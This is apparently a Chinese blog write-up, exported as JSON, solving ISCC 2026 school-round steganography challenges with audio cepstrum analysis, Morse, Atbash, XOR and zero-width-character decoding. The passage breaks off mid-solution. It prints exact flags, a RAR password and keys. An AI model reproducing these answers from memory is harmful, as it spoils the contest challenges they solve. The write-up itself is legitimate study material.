{"id":3744,"date":"2026-05-06T23:44:29","date_gmt":"2026-05-06T15:44:29","guid":{"rendered":"https:\/\/www.sanjiuctf.cn\/?p=3744"},"modified":"2026-05-06T23:46:35","modified_gmt":"2026-05-06T15:46:35","slug":"iscc2026%e6%a0%a1%e8%b5%9bwp","status":"publish","type":"post","link":"https:\/\/www.sanjiuctf.cn\/?p=3744","title":{"rendered":"ISCC2026\u6821\u8d5bwp"},"content":{"rendered":"\n

\u7ec3\u6b66\u9898<\/h1>\n\n\n\n

\u524d\u8a00<\/h1>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u9898\u76ee\u6076\u5fc3\uff0cMisc\u4e3a\u4e86\u96be\u800c\u96be\uff0c\u800c\u4e14pwn\u76f4\u63a5\u88ab\u6253\u7a7f\uff0cWeb\u54ea\u4e2a\u8def\u5f84\u8c01\u53ef\u4ee5\u731c\u51fa\u6765\uff1f<\/p>\n\n\n\n

Misc<\/h2>\n\n\n\n

\u53cc\u6821\u533a\u6765\u4fe1<\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u9644\u4ef6\u5185\u5bb9\u662f\u4e00\u5f20\u56fe\u7247\u548c\u97f3\u9891<\/p>\n\n\n\n

\u76f4\u63a5binwalk \u770b\u53d1\u73b0rar \u63d0\u53d6\u5c31\u884c<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u6709\u5bc6\u7801\uff0c\u770b\u97f3\u9891\uff0c\u9891\u8c31\u56fe<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u5f97\u5230rar\u5bc6\u7801<\/p>\n\n\n\n

hdbxqsdx<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u53ef\u4ee5\u770b\u5230\u5b83\u8fd9\u4e2a\u91cc\u9762\u7684flag \u987a\u5e8f\u662f\u6309\u7167 \u56fe\u7247 \u5b66\u6821\u7684\u6821\u8bad\u6765\u7684<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u539a\u5fb7\u535a\u5b66\u6c42\u662f\u7b03\u884c \u987a\u5e8f\u62fc\u63a5\u5c31\u884c<\/p>\n\n\n\n
ISCC{wE3rT5yU7iO9pL0kJ2hG4fD6sA8qQ}<\/code><\/pre>\n\n\n\n
\u955c\u5385\u4e2d\u7684\u56de\u54cd<\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u51fa\u8fd9\u4e2aMisc\u9898\u76ee\u7684\u4eba\u771f\u795e\u4e86\uff0c\u6700\u5f00\u59cb\u4e1d\u83ab\u738b\u56fd \u56e0\u4e3a\u53c8\u662f\u955c\u5b50\u5c31\u662f\u53cd\u8f6c\u7684\u610f\u601d \u6240\u4ee5\u80af\u5b9a\u6709\u53cd\u8f6c\u4e0d\u5c31\u662f\u6709\u6469\u65af\u5bc6\u7801\u955c\u5b50\u53c8\u6709 \u5c31\u53ef\u4ee5\u60f3\u5230\u57c3\u7279\u5df4\u4ec0\u7801\u56e0\u4e3a\u5b83\u6709 \u955c\u5b50\u5bc6\u7801 \u5c31\u662f\u955c\u50cf\u7ffb\u8f6c<\/p>\n\n\n\n
zip\u8fdb\u884c \u4f2a\u52a0\u5bc6<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u89c6\u9891\u6700\u540e\u5269\u4f5920\u79d2\u5f97\u52302205<\/p>\n\n\n\n
\u53ef\u4ee5\u5f97\u5230\u5bc6\u94a5<\/p>\n\n\n\n
\u4f7f\u7528ffmpeg \u63d0\u53d6\u97f3\u9891 \u5fc5\u987b\u628a\u89c6\u9891\u91cc\u7684\u97f3\u9891\u539f\u5c01\u4e0d\u52a8\u63d0\u53d6\u51fa\u6765\uff0c\u8f6c\u6210\u65e0\u635f WAV\uff0c\u4e0d\u8981\u6709\u4efb\u4f55\u4e22\u5931\u3001\u538b\u7f29\u3001\u7be1\u6539<\/p>\n\n\n\n
ffmpeg -i task.mp4 -vn -acodec pcm_s16le -ar 44100 -ac 2 1.wav<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u97f3\u9891\u542c\u8d77\u6765\u6709\u5f88\u91cd\u7684\u6df7\u54cd\uff0c\u50cf\u5730\u4e0b\u5ba4\u56de\u58f0 \u901a\u5e38\u662f\u56de\u58f0\u9690\u85cf<\/p>\n\n\n\n
\u955c\u5385\u4e2d\u7684\u56de\u54cd<\/p>\n\n\n\n
\u955c\u5385 -> \u5de6\u53f3\u58f0\u9053\u6709\u955c\u50cf\u5173\u7cfb\n\u56de\u54cd -> \u56de\u58f0\u9690\u85cf<\/code><\/pre>\n\n\n\n
\u76f4\u63a5\u8fdb\u884c\u505a Mid\/Side \u5206\u89e3<\/p>\n\n\n\n
Mid  = L + R\nSide = L - R<\/code><\/pre>\n\n\n\n
\u9690\u85cf\u4fe1\u606f\u5728\u5de6\u53f3\u58f0\u9053\u5dee\u5f02\u91cc\uff0c\u76f4\u63a5\u770b Side \u566a\u58f0\u6bd4\u8f83\u591a\uff0c\u6240\u4ee5\u540e\u9762\u8981\u7528 Side \u7684\u5012\u8c31\u51cf\u53bb Mid \u7684\u5012\u8c31\u505a\u5dee\uff1a<\/p>\n\n\n\n
diff = ceps_side - ceps_mid<\/code><\/pre>\n\n\n\n
\u8fd9\u6837\u53ef\u4ee5\u51cf\u6389\u5171\u540c\u7684\u97f3\u4e50\u6210\u5206\uff0c\u7559\u4e0b\u9690\u85cf\u5728\u58f0\u9053\u5dee\u5f02\u91cc\u7684\u56de\u58f0\u7279\u5f81\u3002<\/p>\n\n\n\n
\u770b\u97f3\u9891\u8be6\u7ec6\u4fe1\u606f<\/h4>\n\n\n\n
ffprobe -i 1.wav -show_streams -v quiet<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u627e\u5206\u5757\u957f\u5ea6\uff1a<\/p>\n\n\n\n
\u89c6\u9891\u753b\u9762\u91cc\u7ed9\u4e86 2205\u3002<\/p>\n\n\n\n
\u8fd9\u4e2a\u6570\u548c\u91c7\u6837\u7387\u521a\u597d\u5bf9\u5e94\uff1a<\/p>\n\n\n\n
44100 \/ 2205 = 20<\/code><\/pre>\n\n\n\n
\u4e5f\u5c31\u662f\u6bcf\u79d2 20 \u4e2a\u7b26\u53f7\uff0c\u6240\u4ee5\u6309 2205 \u4e2a\u91c7\u6837\u70b9\u5207\u4e00\u5757\u3002<\/p>\n\n\n\n
\u5355\u58f0\u9053\u91c7\u6837\u5e27\u6570\uff0c\u91c7\u6837\u70b9\uff1a<\/p>\n\n\n\n
1764352 \/ 2205 = 800<\/code><\/pre>\n\n\n\n
\u6b63\u597d\u5f97\u5230 800\u4e2a\u7b26\u53f7\uff0c\u4e5f\u5c31\u662f 100 \u5b57\u8282\uff0c\u5f88\u50cf\u540e\u9762\u80fd\u8f6c ASCII\u3002<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
import wave\nimport numpy as np\n\nwith wave.open('1.wav', 'rb') as f:\n    frames = f.readframes(f.getnframes())\n\nsig = np.frombuffer(frames, dtype=np.int16).astype(np.float64)\nleft = sig[0::2]\nright = sig[1::2]\nmid = left + right\nside = left - right\n\nchunk_size = 2205\nn_chunks = len(side) \/\/ chunk_size\nbits = []\n\nfor i in range(n_chunks):\n    cm = mid[i * chunk_size:(i + 1) * chunk_size]\n    cs = side[i * chunk_size:(i + 1) * chunk_size]\n    ceps_mid = np.fft.ifft(np.log(np.abs(np.fft.fft(cm)) + 1e-10)).real\n    ceps_side = np.fft.ifft(np.log(np.abs(np.fft.fft(cs)) + 1e-10)).real\n    diff = ceps_side - ceps_mid\n    bits.append(1 if diff[100] > diff[130] else 0)\n\nbits = np.array(bits, dtype=np.uint8)\nprint(len(bits))\nprint(bits[:32])<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5012\u8c31\u5206\u6790<\/strong><\/h4>\n\n\n\n
\u5012\u8c31\u8ba1\u7b97\u65b9\u5f0f\uff1a<\/p>\n\n\n\n
ceps = IFFT(log(abs(FFT(x))))<\/code><\/pre>\n\n\n\n
\u6bcf\u4e2a 2205\u91c7\u6837\u70b9\u4e3a\u4e00\u5757\uff0c\u5206\u522b\u8ba1\u7b97 Mid \u548c Side \u7684\u5012\u8c31\u3002<\/p>\n\n\n\n
\u7136\u540e\u770b\u5dee\u5206\u5012\u8c31\u5728\u4e24\u4e2a\u5ef6\u8fdf\u70b9\u4e0a\u7684\u5f3a\u5f31\u3002<\/p>\n\n\n\n
\u5b9e\u9645\u6d4b\u8bd5\u65f6\uff0c100\u548c 130 \u4e24\u4e2a\u91c7\u6837\u70b9\u4f4d\u7f6e\u6700\u660e\u663e\u3002<\/p>\n\n\n\n
\u6bd4\u8f83\u89c4\u5219\uff1a<\/p>\n\n\n\n
diff[100] > diff[130] -> 1\ndiff[100] <= diff[130] -> 0<\/code><\/pre>\n\n\n\n
bit \u8f6c ASCII<\/h4>\n\n\n\n
\u6bcf 8 \u4e2a bit \u8f6c\u6210 1 \u4e2a\u5b57\u8282\uff0c\u524d\u9762\u5f97\u5230\u4e00\u6bb5\u53ef\u8bfb\u6587\u672c\uff1a<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
import os\nimport subprocess\nimport wave\n\nimport numpy as np\n\nmp4 = 'task.mp4'\nwav = '1.wav'\n\nsubprocess.run(\n    ['ffmpeg', '-y', '-v', 'error', '-i', mp4, '-vn', '-acodec', 'pcm_s16le', '-ar', '44100', '-ac', '2', wav],\n    check=True,\n)\n\nwith wave.open(wav, 'rb') as f:\n    frames = f.readframes(f.getnframes())\n    nchannels = f.getnchannels()\n    framerate = f.getframerate()\n    nframes = f.getnframes()\n\nsig = np.frombuffer(frames, dtype=np.int16).astype(np.float64)\nleft = sig[0::2]\nright = sig[1::2]\nmid = left + right\nside = left - right\n\nchunk_size = 2205\nn_chunks = len(side) \/\/ chunk_size\nbits = []\n\nfor i in range(n_chunks):\n    cm = mid[i * chunk_size:(i + 1) * chunk_size]\n    cs = side[i * chunk_size:(i + 1) * chunk_size]\n    ceps_mid = np.fft.ifft(np.log(np.abs(np.fft.fft(cm)) + 1e-10)).real\n    ceps_side = np.fft.ifft(np.log(np.abs(np.fft.fft(cs)) + 1e-10)).real\n    diff = ceps_side - ceps_mid\n    bits.append(1 if diff[100] > diff[130] else 0)\n\nbits = np.array(bits, dtype=np.uint8)\nusable = bits[:len(bits) \/\/ 8 * 8]\nbyte_vals = np.packbits(usable.reshape(-1, 8))\nascii_text = ''.join(chr(int(b)) if 32 <= int(b) <= 126 else f'\\x{int(b):02x}' for b in byte_vals)\n\nprint('channels:', nchannels)\nprint('sample_rate:', framerate)\nprint('frames:', nframes)\nprint('chunk_size:', chunk_size)\nprint('chunks:', n_chunks)\nprint('bits:', len(bits))\nprint('bytes:', len(byte_vals))\nprint('bit_head:', ''.join(map(str, bits[:64])))\nprint('ascii:')\nprint(ascii_text)\n\nif os.path.exists(wav):\n    os.remove(wav)\n<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5f97\u5230\u6469\u65af<\/p>\n\n\n\n
..--- ..--.. ..- .--- -..-. -.-- -.--. ..--- ... .-.-. ...-- .-.. - .-- -.<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
2?UJ\/Y(2S+3LTWN<\/code><\/pre>\n\n\n\n
\u7ed3\u679c\u8fd9\u4e2a\u4e0d\u662f\u6700\u7ec8flag \u8fd8\u6709\u4e00\u5173<\/p>\n\n\n\n
\u57c3\u7279\u5df4\u4ec0\u7801<\/h4>\n\n\n\n
\u955c\u5b50\u5bc6\u7801<\/p>\n\n\n\n
\u5bc6\u94a5\u8fd8\u662f\u89c6\u9891\u91cc\u9762\u7684 2205<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
s = '2?UJ\/Y(2S+3LTWN'\n\nans = []\nfor ch in s:\n    if 'A' <= ch <= 'Z':\n        ans.append(chr(ord('Z') - (ord(ch) - ord('A'))))\n    elif 'a' <= ch <= 'z':\n        ans.append(chr(ord('z') - (ord(ch) - ord('a'))))\n    else:\n        ans.append(ch)\n\nflag = ''.join(ans)\nprint(flag)\nprint(f'ISCC{{{flag}}}')\n<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
ISCC{2?FQ\/B(2H+3OGDM}<\/code><\/pre>\n\n\n\n
\u8c01\u5bb6\u597d\u4ebaflag\u957f\u8fd9\u6837\uff1f<\/p>\n\n\n\n
\u6700\u7ec8exp.py<\/p>\n\n\n\n
import os\nimport subprocess\nimport wave\n\nimport numpy as np\n\nMORSE = {\n    '.-': 'A', '-...': 'B', '-.-.': 'C', '-..': 'D', '.': 'E',\n    '..-.': 'F', '--.': 'G', '....': 'H', '..': 'I', '.---': 'J',\n    '-.-': 'K', '.-..': 'L', '--': 'M', '-.': 'N', '---': 'O',\n    '.--.': 'P', '--.-': 'Q', '.-.': 'R', '...': 'S', '-': 'T',\n    '..-': 'U', '...-': 'V', '.--': 'W', '-..-': 'X', '-.--': 'Y',\n    '--..': 'Z', '-----': '0', '.----': '1', '..---': '2', '...--': '3',\n    '....-': '4', '.....': '5', '-....': '6', '--...': '7', '---..': '8',\n    '----.': '9', '.-.-.-': '.', '--..--': ',', '..--..': '?',\n    \".----.\": \"'\", '-.-.--': '!', '-..-.': '\/', '-.--.': '(', '-.--.-': ')',\n    '.-...': '&', '---...': ':', '-.-.-.': ';', '-...-': '=',\n    '.-.-.': '+', '-....-': '-', '..--.-': '_', '.-..-.': '\"', '.--.-.': '@',\n}\n\ndef atbash(text):\n    out = []\n    for ch in text:\n        if 'A' <= ch <= 'Z':\n            out.append(chr(ord('Z') - ord(ch) + ord('A')))\n        elif 'a' <= ch <= 'z':\n            out.append(chr(ord('z') - ord(ch) + ord('a')))\n        else:\n            out.append(ch)\n    return ''.join(out)\n\nmp4 = 'task.mp4'\nwav = '1.wav'\n\nsubprocess.run(\n    ['ffmpeg', '-y', '-v', 'error', '-i', mp4, '-vn', '-acodec', 'pcm_s16le', '-ar', '44100', '-ac', '2', wav],\n    check=True,\n)\n\nwith wave.open(wav, 'rb') as f:\n    frames = f.readframes(f.getnframes())\n\nsig = np.frombuffer(frames, dtype=np.int16).astype(np.float64)\nleft = sig[0::2]\nright = sig[1::2]\nmid = left + right\nside = left - right\nchunk_size = 2205\nn_chunks = len(side) \/\/ chunk_size\nbits = []\n\nfor i in range(n_chunks):\n    cm = mid[i * chunk_size:(i + 1) * chunk_size]\n    cs = side[i * chunk_size:(i + 1) * chunk_size]\n    ceps_mid = np.fft.ifft(np.log(np.abs(np.fft.fft(cm)) + 1e-10)).real\n    ceps_side = np.fft.ifft(np.log(np.abs(np.fft.fft(cs)) + 1e-10)).real\n    diff = ceps_side - ceps_mid\n    bits.append(1 if diff[100] > diff[130] else 0)\n\nbits = np.array(bits, dtype=np.uint8)\nbyte_vals = np.packbits(bits[:len(bits) \/\/ 8 * 8].reshape(-1, 8))\nmorse_text = ''.join(chr(int(b)) for b in byte_vals)\nclean = ''.join(ch for ch in morse_text if ch in '.- ')\ndecoded = ''.join(MORSE.get(c, '?') for c in clean.strip().split(' ') if c)\nflag = atbash(decoded)\n\nprint(clean)\nprint(decoded)\nprint(f'ISCC{{{flag}}}')\n\nif os.path.exists(wav):\n    os.remove(wav)\n<\/code><\/pre>\n\n\n\n
\u626d\u66f2\u7684\u771f\u76f8<\/h3>\n\n\n\n
\u9898\u76ee\u63d0\u793a:\u5206\u5c42\u9690\u5199\u3001\u8f6c\u6362\u5373\u98a0\u5012\u3001\u81ea\u7f16\u7801\u3001\u6bcf\u4e00\u6b21\u6536\u83b7\u90fd\u6709\u610f\u4e49 \u8fd9\u63d0\u793a\uff0c\u65e0\u8bed<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6700\u6076\u5fc3\u7684\uff0c\u975e\u5e38\u975e\u5e38\u975e\u5e38\u975e\u5e38\u975e\u5e38\u6076\u5fc3\u9898\u76ee \u52fe\u77f3\u9898\u76ee\uff0c\u672c\u6765\u955c\u5385\u4e2d\u7684\u56de\u54cd\u591f\u5389\u5bb3\u4e86\u7ed3\u679c\u8fd8\u6709\u9ad8\u624b\u8fd9\u4e2a\u9898\u76ee\u5c31\u662f \u4e3a\u4e86\u96be\u800c\u96be\uff0c\u6ca1\u6709\u610f\u601d\uff0c\u800c\u4e14\u8fd8\u8981\u9760\u731c\uff0c\u89e3\u51fa\u8fd9\u4e2a\u9898\u76ee\u76f4\u63a5\u548c\u51fa\u9898\u4eba\u539f\u5730\u7ed3\u5a5a\uff0c\u6211\u5bf9\u8111\u7535\u6ce25\u4e2a\u5c0f\u65f6\u89e3\u4e0d\u51fa\uff0c\u65e0\u8bed<\/p>\n\n\n\n
\u662f\u4eba\u53ef\u4ee5\u89e3\u51fa\u6765\u7684\u5417\uff1f<\/p>\n\n\n\n
\u9644\u4ef6\u5185\u5bb9<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u9898\u76ee\u63cf\u8ff0\u540e\u9762\u6839\u636eAi\u5f97\u5230\u662f\u83ab\u6bd4\u4e4c\u65af\u73af<\/p>\n\n\n\n
\u4e3b\u8981\u5c31\u662f \u8d77\u70b9\u4e0e\u53cd\u5411\u7ec8\u70b9\u505aXOR\uff0c\u6839\u636eAI\u53ef\u4ee5\u89e3\u8bfb\u9898\u76ee\u63cf\u8ff0\u8bf4\u7684\u662f\u4ec0\u4e48\uff0c\u6211\u60f3\u4e0d\u7528Ai\u8fd9\u4eba\u600e\u4e48\u53ef\u4ee5\u77e5\u9053\u5462\uff1f\u8fd8\u8981\u6839\u636e\u6587\u8a00\u6587\u53bb\u731c<\/p>\n\n\n\n
\u8c36\u8bed\u89e3\u8bfb<\/p>\n\n\n\n
\u8c36\u8bed<\/th>\u89e3\u8bfb<\/th><\/tr><\/thead>
\u56db\u4f4d\u6210\u7ec4<\/td>\u6bcf32\u4f4d\u503c\u4e2d\u6bcf4\u4f4d\u4e3a\u4e00\u4e2a\u901a\u9053\u7ec4<\/td><\/tr>
\u62c6\u9aa8\u5206\u85cf<\/td>\u539f\u59cb\u6570\u636e\u88ab\u62c6\u5206\u9690\u85cf\u57284\u4e2a\u4ea4\u9519\u901a\u9053\u4e2d<\/td><\/tr>
\u7eb5\u5411\u62fe\u53d6<\/td>\u6309\u901a\u9053\u7eb5\u5411\u63d0\u53d6\u6bcf\u4e2a\u4f4d<\/td><\/tr>
\u5404\u5f52\u5176\u884c<\/td>\u6bcf\u4e2a\u901a\u9053\u72ec\u7acb\u89e3\u7801\u4e3a\u5b8c\u6574\u6587\u672c<\/td><\/tr>
\u96f6\u58f9\u94fa\u8def<\/td>truth.dat\u75310\u548c1\u5b57\u7b26\u7ec4\u6210<\/td><\/tr>
\u5b57\u7b26\u6d6e\u5149<\/td>\u901a\u8fc7\u901a\u9053\u63d0\u53d6\uff0c\u4e2d\u6587\u5b57\u7b26\u663e\u73b0<\/td><\/tr>
\u56db\u8a00\u6210\u8c36<\/td>\u56db\u4e2a\u901a\u9053\u7684\u6587\u672c\u6784\u6210\u5b8c\u6574\u7ebf\u7d22<\/td><\/tr>
\u6c34\u843d\u77f3\u65b9<\/td>\u6700\u7ec8\u7b54\u6848\u6d6e\u51fa\u6c34\u9762<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
\u89e3\u5bc6 secret.dat\uff084\u901a\u9053\u4f4d\u4ea4\u9519\u63d0\u53d6\uff09<\/h4>\n\n\n\n
\u6587\u4ef6\u5206\u6790<\/p>\n\n\n\n
1,608\u4e2a\u5341\u516d\u8fdb\u5236\u5b57\u7b26 \u2192 804\u5b57\u8282 = 201\u7ec432-bit\u6570\u503c\n\u6570\u636e\u7ed3\u6784\u5448\u4e09\u6bb5\u5f0f\u7279\u5f81\uff08\u9ad8\u71b5\/\u4e2d\u71b5\/\u4f4e\u71b5\uff09\n\u6240\u6709\u7ec4\u7684bit 29\u6052\u4e3a1\uff0cbit 28\u6052\u4e3a0<\/code><\/pre>\n\n\n\n
\u89e3\u5bc6\u65b9\u6cd5\uff0c\u6839\u636e”\u56db\u4f4d\u6210\u7ec4\uff0c\u62c6\u9aa8\u5206\u85cf\u3002\u7eb5\u5411\u62fe\u53d6\uff0c\u5404\u5f52\u5176\u884c”\uff0c\u5bf9\u6bcf\u4e2a32-bit\u503c\u8fdb\u884c4\u901a\u9053\u4f4d\u4ea4\u9519\u63d0\u53d6\uff1a<\/p>\n\n\n\n
import sys\nsys.stdout.reconfigure(encoding='utf-8')\n\nwith open('secret.dat', 'r') as f:\n    hex_data = f.read().strip()\n\ngroups = []\nfor i in range(0, len(hex_data), 8):\n    groups.append(int(hex_data[i:i+8], 16))\n\n# 4\u4e2a\u901a\u9053\uff1a\u6bcf\u96944\u4f4d\u53d6\u4e00\u4e2a\u901a\u9053\u76848\u4f4d\nchannels = {\n    'A': [31, 27, 23, 19, 15, 11, 7, 3],  # \u6bcf4\u4f4d\u53d6\u7b2c3\u4f4d\n    'B': [30, 26, 22, 18, 14, 10, 6, 2],  # \u6bcf4\u4f4d\u53d6\u7b2c2\u4f4d\n    'C': [29, 25, 21, 17, 13, 9, 5, 1],   # \u6bcf4\u4f4d\u53d6\u7b2c1\u4f4d\n    'D': [28, 24, 20, 16, 12, 8, 4, 0],   # \u6bcf4\u4f4d\u53d6\u7b2c0\u4f4d\n}\n\nfor name, bits in channels.items():\n    data = bytearray()\n    for g in groups:\n        b = 0\n        for bit in bits:\n            b = (b << 1) | ((g >> bit) & 1)\n        data.append(b)\n    print(f'Channel {name}: {data.decode(\"utf-8\", errors=\"replace\").strip()}')<\/code><\/pre>\n\n\n\n
\u89e3\u5bc6\u7ed3\u679c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
Channel A: \u53d6\u4e00\u4e2a\u957f\u65b9\u5f62\u7eb8\u5e26\uff0c\u5c06\u5176\u672b\u7aef\u7ffb\u8f6c\u4e0e\u9996\u7aef\u7c98\u5408\u540e\uff0c\u53ef\u4ee5\u5728\u73b0\u5b9e\u4e16\u754c\u4e2d\u5f97\u5230\u83ab\u6bd4\u4e4c\u65af\u73af\u3002\nChannel B: \u201d\u8d77\u70b9\u201c\u4ea6\u6216\u201d\u7ec8\u70b9\u201c\u3002\nChannel C: \u5b83\u7684\u66f2\u9762\u5728\u4e09\u7ef4\u7a7a\u95f4\u4e2d\u88ab\u626d\u66f2\u5d4c\u5165\uff0c\u8682\u8681\u5b9e\u9645\u4e0a\u9700\u8981\u722c\u884c\u4e24\u5708\u7684\u957f\u5ea6\u624d\u80fd\u771f\u6b63\u8fd4\u56de\u4e09\u7ef4\u89c6\u89d2\u4e0b\u7684\u540c\u4e00\u51fa\u53d1\u70b9\uff0c\u8fd9\u79cd\u8fd4\u56de\u65e2\u662f\u7a7a\u95f4\u4e0a\u7684\u4e5f\u662f\u65b9\u5411\u4e0a\u7684\u53cd\u8f6c\u3002\nChannel D: The key is WXRoOVVyMDYyYXpaQTA5eTRyczVM<\/code><\/pre>\n\n\n\n
\u56db\u901a\u9053\u542b\u4e49<\/p>\n\n\n\n
Channel A: \u83ab\u6bd4\u4e4c\u65af\u73af\u5236\u4f5c\u65b9\u6cd5\uff08\u7eb8\u5e26\u7ffb\u8f6c\u7c98\u5408\uff09\nChannel B: \"\u4ea6\u6216\" \u8c10\u97f3 \"\u5f02\u6216\" \u2192 XOR\u64cd\u4f5c\u63d0\u793a\nChannel C: \u5173\u952e\u6027\u8d28 \u2014 \u8682\u8681\u9700\u722c\u884c\u4e24\u5708\uff0c\u6d89\u53ca\u65b9\u5411\u53cd\u8f6c\nChannel D: \u5bc6\u94a5\u7684Base64\u7f16\u7801<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5f97\u5230\u5bc6\u94a5<\/p>\n\n\n\n
Yth9Ur062azZA09y4rs5L<\/code><\/pre>\n\n\n\n
\u83ab\u6bd4\u4e4c\u65afXOR\u89e3\u5bc6 truth.dat -RAR\u538b\u7f29\u5305<\/h4>\n\n\n\n
\u6587\u4ef6\u91cc\u9762\u5168\u662f0\u548c1 \uff0c\u6839\u636e\u83ab\u6bd4\u4e4c\u65af\u73af”\u8d77\u70b9\u4ea6\u6216\u7ec8\u70b9”\u7684\u63d0\u793a\uff0c\u5bf9truth.dat\u6267\u884c\uff1a<\/p>\n\n\n\n
XOR: \u7b2ci\u4e2a\u5b57\u7b26\u4e0e\u7b2c(N-1-i)\u4e2a\u5b57\u7b26\u505a\u5f02\u6216\uff0c\u53d6\u6700\u4f4e\u4f4d<\/p>\n\n\n\n
LSB\u6253\u5305: \u6bcf8\u4f4d\u6309LSB\u4f18\u5148\u6253\u5305\u6210\u5b57\u8282<\/p>\n\n\n\n
\u6574\u4f53\u53cd\u8f6c: \u5c06\u8f93\u51fa\u5b57\u8282\u5e8f\u5217\u53cd\u8f6c<\/p>\n\n\n\n
s = open(\"truth.dat\", \"rb\").read().strip()\nhalf = len(s) \/\/ 2\n\n# \u83ab\u6bd4\u4e4c\u65afXOR\uff1a\u8d77\u70b9\u4e0e\u53cd\u5411\u7ec8\u70b9\u5f02\u6216\nbits = []\nfor i in range(half):\n    bits.append((s[i] ^ s[-1 - i]) & 1)\n\n# LSB\u6253\u5305\nout = bytearray()\nfor i in range(0, len(bits), 8):\n    v = 0\n    for j in range(8):\n        v |= bits[i + j] << j  # LSB\u4f18\u5148\n    out.append(v)\n\n# \u6574\u4f53\u53cd\u8f6c\uff08\u83ab\u6bd4\u4e4c\u65af\u73af\u7684\u65b9\u5411\u53cd\u8f6c\u6027\u8d28\uff09\nopen(\"out.rar\", \"wb\").write(out[::-1])<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5f97\u5230\u5c31\u662frar5\u7684\u7b7e\u540d\uff0c\u524d\u9762\u7684\u5bc6\u7801\u8fdb\u884c\u89e3\u538b\u5f97\u5230flag.txt<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5f97\u5230\u5047\u7684flag<\/p>\n\n\n\n
flag={M3650OVzmglnJnNSN128}<\/code><\/pre>\n\n\n\n
\u540e\u9762\u8fd8\u8981\u96f6\u5bbd<\/p>\n\n\n\n
U+200B\u96f6\u5bbd\u7a7a\u683c-U+200C\u96f6\u5bbd\u975e\u8fde\u63a5\u7b26<\/p>\n\n\n\n
\u96f6\u5bbd\u5b57\u7b26\u8f6c\u4e8c\u8fdb\u5236 \u2192 \u83ab\u6bd4\u4e4c\u65afXOR \u2192 PNG\u56fe\u7247\uff0c\u5c06\u96f6\u5bbd\u5b57\u7b26\u89c6\u4e3a\u4e8c\u8fdb\u5236\u6d41\uff08U+200B=0, U+200C=1\uff09\uff0c\u518d\u6b21\u6267\u884c\u83ab\u6bd4\u4e4c\u65afXOR\uff1a<\/p>\n\n\n\n
with open('flag.txt', 'rb') as f:\n    text = f.read().decode('utf-8')\n\nbits = []\nfor ch in text:\n    if ch == 'u200b':\n        bits.append(0)\n    elif ch == 'u200c':\n        bits.append(1)\n\nN = len(bits)  \nhalf = N \/\/ 2\n\nxor_bits = [bits[i] ^ bits[N-1-i] for i in range(half)]\n\nout = bytearray()\nfor i in range(0, len(xor_bits) \/\/ 8 * 8, 8):\n    b = 0\n    for j in range(8):\n        b = (b << 1) | xor_bits[i + j]\n    out.append(b)\n\nopen('hidden.png', 'wb').write(out)<\/code><\/pre>\n\n\n\n
\u5f97\u5230\u56fe\u7247<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u606d\u559c\u4f60\u6765\u5230\u4e86\u6700\u540e\u4e00\u5173,\u73b0\u5728,\n\u4f60\u9700\u8981\u627e\u5230\u4e00\u4e2a\u4e8c\u8fdb\u5236\u5e8f\u5217,\u622a\u53d6\n\u8d77\u59cb\u4f4d\u4e3am,\u957f\u5ea6\u4e3an\u7684\u5b50\u5e8f\u5217,\n\u901a\u8fc7base62\u7f16\u7801\u5f97\u5230\u6700\u7ec8\u7684\u8c1c\u5e95,\n\u90a3\u4e48,\u5229\u7528\u6240\u6709\u4f60\u80fd\u627e\u5230\u7684\u63d0\u793a,\n\u53bb\u89e3\u5f00\u6211\u6700\u7ec8\u7684\u79d8\u5bc6\u5427!<\/code><\/pre>\n\n\n\n
m\u548cn\u770b\u539f\u6765\u7684flag\u5c31\u77e5\u9053\u4e86m=3600 n=128,\u540e\u9762\u5c31\u6839\u672c\u627e\u4e0d\u5230\u4e1c\u897f<\/p>\n\n\n\n
\u57fa\u672c\u4e0a\u6240\u6709\u4eba\u90fd\u5230\u8fd9\u91cc\uff0c\u5c31\u89e3\u4e0d\u51fa\u6765\u4e865\u67086\u53f7\u4e2d\u5348\uff0c\u6709\u4e00\u4e2a\u552f\u4e00\u89e3\u7684\uff0c\u5927\u4f6c\u7684\u535a\u5ba2<\/p>\n\n\n\n
https://wang1rrr.github.io\/2026\/05\/06\/ISCC-%E6%A0%A1%E8%B5%9B-misc3-WP\/<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u540e\u9762\u6211\u7c98\u8d34\u7684\u8fd9\u4f4d\u5927\u4f6c\u7684wp<\/p>\n\n\n\n
\u8bfb PNG \u91cc\u7684\u6700\u7ec8\u63d0\u793a<\/h4>\n\n\n\n
PNG \u91cc\u5199\u7684\u662f\uff1a<\/p>\n\n\n\n
